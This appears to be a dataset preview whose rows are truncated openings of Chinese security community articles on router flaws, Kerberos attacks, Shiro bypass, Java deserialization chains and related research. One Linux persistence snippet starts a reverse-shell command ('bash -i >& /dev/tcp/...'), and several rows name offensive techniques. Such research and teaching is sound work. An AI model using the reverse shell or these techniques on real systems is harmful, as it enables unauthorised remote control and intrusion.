text
stringlengths
100
9.93M
category
stringclasses
11 values
# 华为3g路由器的综合性学习:xss,csrf,ddos,非认证的固件更新,远程代码执行 | ##### 译文声明 本文是翻译文章,文章来源:匿名@360安全播报 原文地址:<https://pierrekim.github.io/blog/2015-10-07-Huawei-routers-vulnerable-to-multiple-threats.html> 译文仅供参考,具体内容表达以及含义原文为准。 **漏洞描述: ** Huawei B260A 3G调制解调器因为有缺陷的安全设计引发一些安全漏洞,该设备在许多国家被广泛使用(比如沃达丰) 下面的测试固件版本是:846.11.15.08.115 (测试时的最新版) 该...
社区文章
From: [segmentfault 求索新知专栏](https://segmentfault.com/a/1190000008491823) 作者: [风云信步](https://segmentfault.com/u/bryansharp) ### 前言 有时候我们在Android开发过程中可能有这样的需求:需要研究或者修改工程依赖的Jar包中的一些逻辑,查看代码运行中Jar包代码内部的取值情况(比如了解SDK与其服务器通信的请求报文加密前的情况)。 这个需求类似于Hook。 但是往往这些依赖的Jar包中的代码已经被混淆过,删去了本地变量表和代码行号等debug信息,所以无法直接断点调试,其内部逻辑和运行情况也几乎无法触及,研究...
社区文章
`先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。` ### 投稿 * 直接右上角`【个人中心】`-`【创建新帖子】`-`【节点模块】`选择`【技术文章】`。投稿时麻烦提供下可联系到作者的IM,方便审核沟通。(如未收到回复,联系wx:50421961) * Ps: `MD编辑器支持图片拖拽上传、Word文档图片直接复制上传、截图复制自动上传 (๑•̀ㅂ•́)و✧` * * *
社区文章
# 前言 在笔者学习完Kerberos之后,对下图每一个知识点对应的攻击方式以及其中的坑进行了总结。在本文中会介绍下面的每一种攻击方法,但因篇幅问题在这里不会详细介绍kerberos的具体协议。请君选取所爱部分进行学习,如文章略有文笔不好的地方,可对比其他师傅的文章即可领悟。 # 目录 ## AS-REQ **hash传递攻击(PTH)** :哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。 **域外用户枚举** :当我们不在域内时,可以通过kerberos中的AS_REQ工作原理来进行枚举域内账号。 **密码喷洒攻击(Password...
社区文章
# TISC 2020 CTF 题目分析及writeups | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 简介 TISC(The InfoSecurity Challenge) 2020 CTF 一共包含6道题目,主要涉及密码学、二进制、逆向等知识点,部分题目之间具备一定的连续性,下面对题目进行具体分析。 ## STAGE 1:What is this thing? 连接服务后,指向一个zip文件连接。 $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\ \__$$ __|\_$$ _|$$ __$$\ $$ __$$\ $$...
社区文章
**Apache Shiro 身份验证绕过漏洞 (CVE-2020-11989)** Shiro这个框架,我相信各位经常挖洞的师傅都不会陌生,因为这个框架有着臭名昭著的反序列化漏洞( **CVE-2016-4437** ),攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 但是,今天我们要讲的是 **Shiro身份验证绕过漏洞** ,这个漏洞已经出来大半年了,只是之前一直觉得作用并不明显( **这是因为自己太菜了** ),最近正好遇到一次,遂之记录一下。 **0x00漏洞详情** Apache Shiro是一个强大且易用的Java安全框架,它可以用来执行身份验证、授权、...
社区文章
# 前言 这次我们来了解一下Tea系列算法,先从原始的`Tea`开始了解 ## 原理介绍 在密码学中,微型加密算法(Tiny Encryption Algorithm,TEA)是一种易于描述和执行的块密码,通常只需要很少的代码就可实现。其设计者是剑桥大学计算机实验室的大卫·惠勒与罗杰·尼达姆。这项技术最初于1994年提交给鲁汶的快速软件加密的研讨会上,并在该研讨会上演讲中首次发表。 TEA操作处理在两个32位无符号整型上(可能源于一个64位数据),并且使用一个128位的密钥。XTEA和XXTEA算法都是TEA算法的升级版,并且完善了其安全性。 有关其他的介绍可以参考[百度百科](https://baike.baidu.com/ite...
社区文章
# 我如何入侵Facebook: 第一部分 自三月份以来,我就一直处在疫情中。自从疫情开始,我有大量空闲的时间,为了明智地利用这段时间,所以我决定去获得OSWE的认证,并在8月8号完成了这个考试。之后,我花了几个星期从考试中恢复过来。在9月份中旬,我说你知道吗? 我没有像每年一样在2020的FaceBook名人堂中注册自己的名字。好吧,让我们开始吧 ​ . . . 我从来没有在Facebook的任何子域中找到过一个漏洞,我看一些wp和其中有一篇非常好的针对Facebook某个子域的wp吸引了我所有的注意,你可以点击查阅它:[[HTML to PDF converter bug leads to RCE in Facebook ser...
社区文章
## CC3 ### 前言 CC3相当于CC1和CC2的结合,仔细分析过CC1和CC2来看CC3就非常简单。 可参考: [通俗易懂的Java Commons Collection 1分析](https://xz.aliyun.com/t/10357) [通俗易懂的Java Commons Collection 2分析](https://xz.aliyun.com/t/10387) **环境搭建** * JDK 1.7 * Commons Collections 3.1 * javassist `pom.xml`中添加: <dependencies> <dependency> ...
社区文章
**译者:知道创宇404实验室翻译组** **原文链接:<https://decoded.avast.io/janrubin/complex-obfuscation-meh/>** ### 前言 最近一段时间,我们一直在监测一种新的恶意程序,我们称之为“Meh”。这一切都是在我们遇到大量文件时开始的,这些文件的开头是随机生成的字符串,然后是一个编译的AutoIt脚本…… ### 分析 Meh由两个主要部分组成。 **第一部分是解密器,我们将其命名为MehCrypter** ,它由多个阶段组成,并作为已编译的AutoIt脚本进行分发,以随机生成的字符串序列作为前缀。AutoIt解释程序将跳过此字符串序列,该解释程序将扫描确定文件格...
社区文章
# 内网渗透代理之frp的应用与改造(二) | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 > 上篇:<https://www.anquanke.com/post/id/231424> ## 0x4 frp的改造 ### 0x4.1 修改特征 正常来说,开了tls加密,流量都会加密,所以是没办法直接检测出来的。 不过官方文档有说到一个有趣的特征,结合上面的分析确实如此: > 从 v0.25.0 版本开始 frpc 和 frps 之间支持通过 TLS 协议加密传输。通过在 `frpc.ini` 的 `common` 中配置 > `tls_enable = true` 来启用此功能,安全性更高。...
社区文章
**作者:启明星辰ADLab 公众号:<https://mp.weixin.qq.com/s/E0pEAADV7kMrpTIYqjip0g>** # **1.** 摘要 近日,国外安全专家声称发现部分采用华为海思芯片的摄像头产品存在后门,经启明星辰ADLab安全研究人员分析,该漏洞主要影响采用海思视频解码芯片的第三方的摄像头产品及摄像头模组,漏洞源于第三方的摄像头产品方案设计不当造成。 值得注意的是,该漏洞启明星辰ADLab安全研究人员在2017年已经发现,并通过多种渠道提交给相关方案厂商。 通过这个漏洞,恶意攻击者可以远程开启摄像头设备的telnet端口,并利用通用密码完成验证,从而完全控制摄像头设备。 根据监测数据,目前受影...
社区文章
**作者:启明星辰ADLab 原文链接:<https://mp.weixin.qq.com/s/JtPEWD66yhhRWe_MpnPMaQ>** ## 1 前言 近期,以色列安全咨询企业JSOF在最新报告中披露了七个 DNSmasq 漏洞(统称 DNSpooq),并指出攻击者借此感染了数以百万计的设备。DNSmasq 是一套流行的开源 DNS 转发软件,能够为运行该软件的网络设备添加 DNS 缓存和 DHCP 服务器功能,广泛用于各种小型局域网络。受 DNSpooq 影响的设备不仅可能遭遇 DNS 缓存中毒,还可被用于远程代码执行、拒绝服务(DoS)攻击。目前受影响的厂商包括但不限于 Android / Google、康卡斯特...
社区文章
# 第二部分:USB设备的研究——MSC与PTP及MTP | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<http://nicoleibrahim.com/part-2-usb-device-research-msc-vs-ptp-vs-mtp/> 译文仅供参考,具体内容表达以及含义原文为准。 **在本系列之前的帖子中,我站在研究USB设备的角度谈到了我们想要研究的目标和论题。今天我主要将内容涵盖三个USB传输协议。重点如下:** 每个内容的基础知识 支持它们的Widnwos版本 支持它们的Windows服务 基础的Windows信息枚举 探讨不同论题之间的相关性 USB海量存储类(USB Mass ...
社区文章
# 安卓逆向面试题汇总 技术篇 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 大家好,我是王铁头 一个乙方安全公司搬砖的菜鸡 持续更新移动安全,iot安全,编译原理相关原创视频文章。 因为本人水平有限,文章如果有错误之处,还请大佬们指出,诚心诚意的接受批评。 ## 简介 这篇文章详细讲解了,安卓面试经常会问到的几个技术问题。 以及相关的背景知识,技术原理。 文章中用到的资料代码 看这里:<https://github.com/wangtietou/Wtt_Mobile_Security> * * * 本菜鸡大概面试了30多家公司,因为学历比较差(大专),很多公司看了简历直接就把我刷了。或者简历...
社区文章
# 0x00 信息收集 目标地址:<http://oa.xxx.com:8888/art/> ,访问后界面如下 nmap扫描全端口:nmap -v -A -p1-65535 -oN oa.xxx.com.txt oa.xxx.com 结果只开放了53/tcp和8888/tcp,如下图 网络架构猜测:被扫描的ip应该是公司的出口防火墙,网站躲在防火墙的后面,防火墙开了8888端口转发到内部服务器,至于53/tcp可能是防火墙本身开的端口 系统方面的利用点应该没什么机会了,只能在web上寻找突破口 burp抓包,发送到repeater,由圈出来的2个地方可猜测,目标没有web服务器,应用服务器用的tomcat,后端开发语言是...
社区文章
**作者:donky16@360云安全 本文首发于安全客:<https://www.anquanke.com/post/id/241265>** ## 背景介绍 传统waf以规则匹配为主,如果只是无差别的使用规则匹配整个数据包,当规则数量逐渐变多,会造成更多性能损耗,当然还会发生误报情况。为了能够解决这些问题,需要对数据包进行解析,进行精准位置的规则匹配。 正常业务中上传表单使用普遍,不仅能够传参,还可以进行文件的上传,当然这也是一个很好的攻击点,waf想要能够精准拦截针对表单的攻击,需要进行multipart/form-data格式数据的解析,并针对每个部分,如参数值,文件名,文件内容进行针对性的规则匹配拦截。 虽然RFC规范...
社区文章
# ROIS CISCN线上初赛 Writeup ## Misc ### 签到 根据题目提示,三个男生女装对着摄像头跳宅舞就行了。我们跳的是《ハレ晴レユカイ》。 ### saleae 使用saleae logic打开,有4个channel,使用SPI协议分析,直接提取出flag ### 24c 还是使用saleae logic打开,有2个channel,使用I2C协议分析 查询24c文档可以知道`Setup Write` 之后需要输入的一个字符, 是为写储存的首地址 分析每段的输入 如下 第一段中为 ``, ord(' ') = 32 第二段中为 `0`, 第三段中为 `\t`, ord('\t') = 9 所以最终...
社区文章
# 撕开编译器给throw套上的那层皮——代码还原 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 1、前言 做软件开发的同事或多或少都用过throw,而我是个例外,我第一次“真正接触”throw,是在一次dmp的分析中,追踪异常数据时,深入的挖了下,觉得里边有些东西对大家在开发中遇到异常时,可能会有些帮助。本文经过简单的逆向分析,弄清楚有关于throw的全貌,使得你将来无论是使用throw还是分析dmp时,都如鱼得水,游刃有余。撰以小文,与君分享。 ## 2、实验分析过程 写了个简单的demo如下,完全是为了演示throw,演示环境为VS2010,X86,Release; cl...
社区文章
# 【技术分享】面向企业网络的数据暗渡攻防大战 | ##### 译文声明 本文是翻译文章,文章来源:安全客 原文地址:<https://pentest.blog/data-exfiltration-tunneling-attacks-against-corporate-network/> 译文仅供参考,具体内容表达以及含义原文为准。 **** **** **翻译:**[ **shan66** ****](http://bobao.360.cn/member/contribute?uid=2522399780) **预估稿费:200RMB(不服你也来投稿啊!)** ******投稿方式:发送邮件至**[ **linwei#360.cn...
社区文章
# 靶场环境 修改host文件,路径 C:\Windows\System32\drivers\etc\hosts,添加如下配置 172.16.6.10 www.theyer.com 172.16.6.10 shop.theyer.com # 总体思路 为了避免读者“不识庐山真面目,只缘身在此山中”,被我混乱的操作搞得云里雾里,笔者先在前面画了一张思路图供大家参考 # 外网边界渗透 题目入口:www.theyer.com 拿到主站入口以后,开始信息搜集:子域名信息搜集,搜集到shop.theyer.com,继续进行目录信息搜集和端口信息搜集 目录扫描发现了一个upload目录(后面用得到),端口信息搜集发现开放了330...
社区文章
# 潜伏在身边的危机:智能设备安全 | ##### 译文声明 本文是翻译文章,文章来源:tencent 原文地址:<http://security.tencent.com/index.php/blog/msg/94> 译文仅供参考,具体内容表达以及含义原文为准。 “只有具备犯罪能力的人才能洞察他人的犯罪行为!” **【目录】** 1、引言:戏里戏外 2、探索:未雨绸缪 3、发现:危机四伏 3.1 智能家居 3.2 移动金融设备 3.3 车联网 3.4 可穿戴设备 4、沉淀:厚积薄发 5、展望:路漫修远 **【引言:戏里戏外】** 图1:《窃听风云》电影片段 如果有看过电影《窃听风云》的朋友,应该都记得里面存在【图1】的片段,故事背景...
社区文章
# 深入XPC:逆向分析XPC对象 | ##### 译文声明 本文是翻译文章,文章原作者 Fortinet,文章来源:fortinet.com 原文地址:<https://www.fortinet.com/blog/threat-research/a-look-into-xpc-internals—reverse-engineering-the-xpc-objects.html> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 最近我在FortiGuard实验室一直在深入研究macOS系统安全,主要关注的是发现和分析IPC漏洞方面内容。在本文中,我将与大家分享XPC内部数据类型,可以帮助研究人员(包括我自己)快速分析X...
社区文章
# 如何滥用DCOM实现横向渗透 ##### 译文声明 本文是翻译文章,文章来源:https://bohops.com/ 原文地址:<https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 在本文中我们讨论了如何利用DCOM实现横向渗透以及执行载荷,主要原理是找到特定的DCOM注册表键值,这些键值指向“远程”主机上并不存在一些二进制程序。如果`\targetadmin$system32`目录中不存在`mobsync.exe`,那么这种方法很有可能行之有...
社区文章
# 【系列分享】QEMU内存虚拟化源码分析 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 作者:[Terenceli @ 360 Gear Team](http://bobao.360.cn/member/contribute?uid=2612165517) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **传送门** [**【系列分享】探索QEMU-KVM中PIO处理的奥秘**](http://bobao.360.cn/learning/detail/4079.html) 内存虚拟化就是为虚拟机提供内存,使得虚拟机能够像在物理机上正常工作,这需要虚...
社区文章
# 看我如何在Lenovo主机上通过不安全的对象执行代码 | ##### 译文声明 本文是翻译文章,文章原作者 riscybusiness,文章来源:riscy.business 原文地址:<http://riscy.business/2017/12/lenovos-unsecured-objects/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 不久之前,Alex Ionescu在一次演讲中介绍了[不安全共享内存对象](http://www.alex-ionescu.com/infiltrate2015.pdf)方面内容。这种方法貌似可以应用于攻击场景,因此我在自己的Lenovo主机上运行[WinObj](ht...
社区文章
# 如何利⽤Quake挖掘某授权⼚商边缘站点漏洞 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x00 360Quake牛刀小试 在对某厂商进行授权安全测试时,苦于寻找资产,于是决定利用网络空间测绘系统来看看有没有奇效。 刚好近期看到360发布了Quake空间测绘系统(quake.360.cn),试用了下感觉还不错。 于是想通过Quake中的title语法来简单的搜索边缘资产。 搜到疑似该厂商的一个边缘站点。根据经验,像这种界面的系统一般多多少少都有漏洞。 因为站点只有一个后台界面,所以我们的漏洞利用点一般先是寻找爆破弱口令账户,或者是找到一处全局越权。最好是弱口令账户。经过...
社区文章
**作者:LoRexxar'@知道创宇404实验室 时间:2020年9月21日** **英文版:<https://paper.seebug.org/1345/>** ### 前言 自从人类发明了工具开始,人类就在不断为探索如何更方便快捷的做任何事情,在科技发展的过程中,人类不断地试错,不断地思考,于是才有了现代伟大的科技时代。在安全领域里,每个安全研究人员在研究的过程中,也同样的不断地探索着如何能够自动化的解决各个领域的安全问题。其中自动化代码审计就是安全自动化绕不过去的坎。 这一次我们就一起聊聊自动化代码审计的发展史,也顺便聊聊如何完成一个自动化静态代码审计的关键。 ### 自动化代码审计 在聊自动化代码审计工具之前,首先...
社区文章
# ORACLE PEOPLESOFT远程执行代码:将XXE盲注到SYSTEM SHELL ##### 译文声明 本文是翻译文章,文章来源:www.ambionics.io 原文地址:<https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce> 译文仅供参考,具体内容表达以及含义原文为准。 ## Oracle PeopleSoft 几个月前,我有机会审核了几个Oracle PeopleSoft解决方案,包括PeopleSoft HRMS和PeopleTool。 `PeopleSoft`应用程序使用 了很多不同的端点,其中很 多端点未经过身份验 证。其中也有很多服务是使用了...
社区文章
# 调研报告 | 以色列网络安全调研报告 ##### 译文声明 本文是翻译文章,文章原作者 时间之外沉浮事,文章来源:时间之外沉浮事 原文地址:<https://mp.weixin.qq.com/s/uaMfeENw6DexSNNO-Cbl_Q> 译文仅供参考,具体内容表达以及含义原文为准。 作者:[时间之外沉浮事 ](https://mp.weixin.qq.com/s/uaMfeENw6DexSNNO-Cbl_Q) 注:某内部以色列网络安全调研报告(非密,公开发行,侵删)。 ## 1、以色列网安发展策略 以色列因与邻国长期处于战乱,以色列的高军事预算、攻防武器研发及全民皆兵制度,被认为是目前网络安全技术及人力的重要关键基础;以色...
社区文章
原文地址:[先知安全技术社区](https://xianzhi.aliyun.com/forum/read/1570.html) 作者:[heeeeen@MS509Team](http://www.ms509.com/) #### 0x01 概要 2017年5月的 Android 安全公告修复了我们提交的一个蓝牙提权中危漏洞,这个漏洞尽管简单,但比较有意思,能够使本地恶意 App 绕过用户交互,使用户强制接收外部传入的蓝牙文件。漏洞概要如下: * CVE: CVE-2017-0601 * BugID: A-35258579 * 严重性: 中 * 影响的 Google 设备: All * Updated AOSP ...
社区文章
# 移动基带安全研究系列之一:概念和系统篇 ##### 译文声明 本文是翻译文章,文章原作者 谢君,文章来源:谢君 原文地址:<https://mp.weixin.qq.com/s/YYicKHHZuI4Hgyw25AvFsQ> 译文仅供参考,具体内容表达以及含义原文为准。 作者:谢君@阿里安全 ## 背景 随着5G大浪潮的推进,未来万物互联将会有极大的井喷爆发的可能,而移动基带系统作为连接世界的桥梁,必将成为未来非常重要的基础设施,而基础设施的技术自主能力已经上升到非常重要的国家层面上的战略意义,从美国对待中国的通信产商华为的禁令就可以看得出基础技术的发展对一个国家的震慑,现今人类的生产生活已经离不开移动通信,未来也将会继续是引领...
社区文章
## 前言: 金蛇剑:此剑金光灿烂形状奇特,剑身犹如是一条蛇盘曲而成。蛇尾构成剑尖蛇头藏与剑柄,握在手中甚是沉重,原是由黄金铸造而成。此剑形状甚是奇特,整柄剑就如是一条蛇盘曲而成,蛇尾勾成剑柄,蛇头则是剑尖,蛇舌伸出分叉,是以剑尖竟有两叉。 ## 主角: hibernate ## 介绍: Hibernate是一个开放源代码的对象关系映射框架,它对JDBC进行了非常轻量级的对象封装,它将POJO与数据库表建立映射关系,是一个全自动的orm框架,hibernate可以自动生成SQL语句,自动执行,使得Java程序员可以随心所欲的使用对象编程思维来操纵数据库。曾几何时,java web程序员必备面试宝典,ssh(spring+struts...
社区文章
**作者:0xcc 原文链接:<https://mp.weixin.qq.com/s/PGC7LKu-oC5ZaRxLFrhTsg>** 请注意本文与 kernelcache 没有任何关系。 只要逆向分析过 iOS 用户态程序,对 dyld_shared_cache [1] (下文简称 dsc)都不会陌生。这个机制将所有系统内置的动态链接库都绑定起来,变成一坨巨大的二进制文件,无疑给反编译工作带来了额外的工作量和难以磨灭的心理阴影。而近期转正的 macOS Big Sur 也用上了 dsc,本来岁月静好的桌面平台研究也突然变得麻烦起来。 分析 DSC 通常的做法是使用 dsc_extractor 提取出单独的库文件,然后像对待普...
社区文章
# 红队java代码审计生命周期 @深信服-华南天玄攻防战队-KBAT ## 前言 红队java代码审计生命周期中常见的一些漏洞学习总结以及一些审计思路。 ## 红队java代码审计生命周期 源码获取->审计环境配置->代码审计->poc&exp编写->后渗透利用->相关文档输出 ## 源码获取 * 开源、二开(官网、github、码云) * 相似站点批量扫备份文件 * 相似站点getshell打包 * 网盘搜索 * 咸鱼、淘宝、TG * 云市场 * ...... ## 审计环境 * idea * vscode * jdk8(按源码支持的) * tomcat * burp * ...
社区文章
**作者:tom0li** **本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org** # 0x00 容器101 docker 启动的调用链如下: docker-client -> dockerd -> docker-containerd -> docker-containerd-shim -> runc(容器外) -> runc(容器内) -> containter-entrypoint Docker利用Linux Namespace实现了操作系统级的资源隔离. 逃逸思路: 用户层: 用户配置不当 服务层: 容器服务自身缺陷 ...
社区文章
### 前言 漏洞编号:CNTA-2019-0014 大致是因为 wls9_async_response 包有个啥反序列化,上一次同样类型的漏洞在17年,那时候还不知道weblogic,刚好论文结尾了来学习下漏洞原理 XmlDecoder 相关安全不在此篇文章中介绍,也莫得poc,仅仅分享分析思路和漏洞触发流程 高版本weblogic如12.2.1.2默认不会部署该war包,我的测试版本是10.3.6 ### 调用链 BaseWSServlet#service -> SoapProcessor#process -> ServerDispatcher#dispatch -> HandlerIterator#...
社区文章
# 【技术分享】metasploit下Windows的多种提权方法 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** **** **作者:**[ **** **pwn_361** ****](http://bobao.360.cn/member/contribute?uid=2798962642) **预估稿费:300RMB(不服你也来投稿啊!)** **投稿方式:发送邮件至**[ **linwei#360.cn** ****](mailto:linwei@360.cn) **,或登陆**[ **网页版**](http://bobao.360.cn/contribut...
社区文章
# phpBB中惊现CSRF漏洞 | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<https://www.landaire.net/blog/finding-a-csrf-vulnerability-in-phpbb/> 译文仅供参考,具体内容表达以及含义原文为准。 不久之前,我在phpBB中管理控制面板的实现代码中发现了一个CSRF(跨站请求伪造)漏洞,值得一提的是,这段代码是以BBCode风格开发的。phpBB的开发团队于2016年1月11日发布了phpBB 3.1.7-PL1,并在这个版本中修复了我之前所发现的那个CSRF漏洞。由于BBCode会将管理员所创建的HTML页面自动列入网站的白名单之...
社区文章
# 简介 无人机曾一度成为黑客讨论的焦点。讨论的主要是如何解除无人机的一些限制,将无人机的控制信道设置为更高的频率,移除飞行高度的限制等。很多资料都备份在github上,地址:<https://github.com/MAVProxyUser/P0VsRedHerring> 。 DJI Spark是2017年发布的一款无人机,而且技术相对成熟。但与Phantom 4和Mavic等机型相比,Spark的价格也相对便宜,只有499美元。Spark的核心是Leadcore LC1860C ARMv7-一个运行Android 4.4系统的CPU,升级更新的文件扩展为.sig。升级更新的文件是用RSA-SHA256签名的,部分升级的文件中是用A...
社区文章
# 在Windbg中明查OS实现UAC验证全流程——三个进程之间的"情爱"[3] ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0、引言 在前一篇《在Windbg中明查OS实现UAC验证全流程——三个进程之间的”情爱”[2]》简短的分析了下AIS的方方面面的细节,这一篇抛开这些,来深入分析下检测的逻辑以及拉起consent进程的逻辑。 整个系列涉及到的知识: 0、Windbg调试及相关技巧; 1、OS中的白名单及白名单列表的窥探; 2、OS中的受信目录及受信目录列表的查询; 3、窗口绘制[对,你没看错,提权窗口就涉及到绘制]; 4、程序内嵌的程序的Manifest; ...
社区文章
**作者:京东安全 Dawn Security Lab 原文链接:<https://dawnslab.jd.com/mystique/#more>** ## 什么是魔形女漏洞? “魔形女”漏洞展示了一个此前未曾发现的新的攻击路径,在最新的安卓11(漏洞发现时最新的Android版本)上能够稳定打破安卓应用沙箱防御机制。通过多个零日漏洞组合,攻击者的零权限恶意应用程序可以在用户无感知的情况下绕过安卓应用沙箱,攻击任何其他应用,如Facebook、WhatsApp等。读取应用程序的数据,获取应用权限。我们给这条链命名“魔形女”源于著名的漫威漫画人物,因为它拥有类似的能力。 ## 是远程代码执行漏洞吗? 不是,“魔形女”本身是一个本地...
社区文章
# 前言 本来之前爆出这个反序列化链的时候,感觉这个反序列化的链子和`Lavarel`爆的链子有异曲同工之妙,所以本着复现的想法整一下,然后发现了几个绕过的姿势。拿出来和师傅们交流交流,抛转引玉吧。 # 熟悉Yii框架 首先通过这个[Hello World](https://www.yiichina.com/doc/guide/2.0/start-hello)来了解一下这个框架的基本使用方法。这样便于我们更加快速的去了解这个框架. 即使不说,也可以知道这个其实就是一个`mvc`框架。所以所有的逻辑基本上和控制器有关。所以先来讲讲控制器的使用. ## 控制器 这里可以看到控制器的一个基本的使用方法. <?php nam...
社区文章
# AntCTFxD^3CTF pwn 分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 分享一下比赛中除了Deterministic Heap之外的 ~~六~~ 五道题。 ## d3dev & d3dev_revenge 一道简单的qemu pwn,很适合入门,入门知识可参考[qemu-pwn-基础知识](https://ray-cp.github.io/archivers/qemu-pwn-basic-knowledge),这里就不再赘述。 1. 首先查看`launch.sh`启动脚本: #!/bin/sh ./qemu-system-x86_6...
社区文章
本文是[《TCP Reverse Shell in Assembly (ARM 32-bit)》](https://azeria-labs.com/tcp-reverse-shell-in-assembly-arm-32-bit/)的翻译文章。 在本教程中,你将学习如何编写没有空字节的TCP反向shellcode。 如果你想从更基础的开始,你可以学习如何在汇编中编写一个[简单的execve() shell](https://xz.aliyun.com/t/4098),然后再深入研究这个稍微更难的教程。 如果你需要复习Arm程序集的知识,请查看我的[ARM Assembly Basics](https://azeria-labs.co...
社区文章
> 后量子时代的应用密码策略 > I.S. Kabanov, R.R. Yunusov, Y.V. Kurochkin and A.K. Fedorov > Cambridge & Skolkovo > 来源:<https://arxiv.org/abs/1703.04285> # 摘要 量子密钥分发技术保证了信息安全,目前正在商业应用中部署试用。我们通过使用经典密码、量子密码、混合经典量子和后量子密码,研究通信和分布式存储应用中信息安全技术的新领域。我们分析了当前最先进的关键特征、发展趋势以及这些技术在企业信息保护系统中的应用局限性,讨论了企业在分支的通信网络中如何选择合适的加密技术。 # 1 引言 通用量子计算...
社区文章
# Linux 内核利用技巧: Slab UAF to Page UAF ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 author: 熊潇 of [IceSword Lab](https://www.iceswordlab.com/about/) 本文研究了内核编译选项 `CONFIG_SLAB_MERGE_DEFAULT` 对 `kmem_cache` 分配的影响. 以及开启该配置的时候, slab UAF 的一种利用方案 ([方案来源](https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/), 本文内容基于 Linu...
社区文章
# 逃避沙箱并滥用WMI:新型勒索软件PyLocky分析 | ##### 译文声明 本文是翻译文章,文章原作者 Trendmicro,文章来源:trendmicro.com 原文地址:<https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 概述 尽管目前,勒索软件的势头已经得到控制,但它仍然是网络犯罪的重要组成部分。事实上,在2018上半年,勒索软件的活跃度有所增加,这些勒索软件通过调整策略躲避安全软件的监测,...
社区文章
# Linux权限维持 ## 0X00 关于权限维持 ### 什么是权限维持? 我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标. ## 0X01 获得初始权限 Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作. 能否反弹shell,要根据目标的环境来尝试,有可能bash无法直接反弹,但是python却可以成功,还要注意白名单问题. 实验环境准备直接用Kali,记得做好快照. ### Bash bash -i >& /dev/tcp/10....
社区文章
# 多拳出击:Windows新安全机制如何防御无文件恶意软件 ##### 译文声明 本文是翻译文章,文章来源:microsoft.com 原文地址:<https://cloudblogs.microsoft.com/microsoftsecure/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、概述 在我们的日常监测过程中,发现有两个前所未见、经过严重混淆的脚本,成功通过了基于文件的反病毒检测...
社区文章
# 梨子带你刷burpsuite靶场系列之客户端漏洞篇 - WebSocket专题 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 本系列介绍 > > PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。 ## 梨子有话说 > > 梨子也算是Web安全初学者,所以本系列文章中难免出现各种各样的低级错...
社区文章
## 简介 大约一年前的时候,我测试过Shopify,从那个时候起,我就写了个脚本监控他家的资产,主要是跟踪新的api以及url。几个月之后我收到一个新的通知: > /shops/REDACTED/traffic_data.json > /shops/REDACTED/revenue_data.json 老实说,我没有那么时间去检查那么多的资产,每次有新的提醒,我就花几个小时看看,主要还是靠自动化。 回到话题 这意味着最后一个api已经从子域中删除,这是一个不错的提醒,让我想深入了解发生了什么事情,并调查它被删除的原因。 ## 目标极有可能存在漏洞 经过排查,`REDACTED`是一个商店的名字,`REDACTED ...
社区文章
### 介绍 在最近几天,一场声势浩大的网络攻击袭击了意大利的一些组织。正如N020219的公告所示,攻击者尝试伪造Express Courier合法通信来进行攻击。然而在分析`Cybaze-Yoroi ZLAB`的同时,我们的分析人员偶然间发现了`AZORult工具包`与`Gootkit`木马payload之间的某些联系。 ### 技术分析 #### 步骤一—附加的Javascript信息 大多数攻击尝试均是由特定的电子邮件附件开始。其附件中包含隐秘JavaScript代码的压缩存档,而此压缩文档能够在攻击的初始阶段绕过防病毒的检测。 这个JS文件是一个被模糊过的`dropper`工具,其目的是“安全”的远程位置下载另一个组件: ...
社区文章
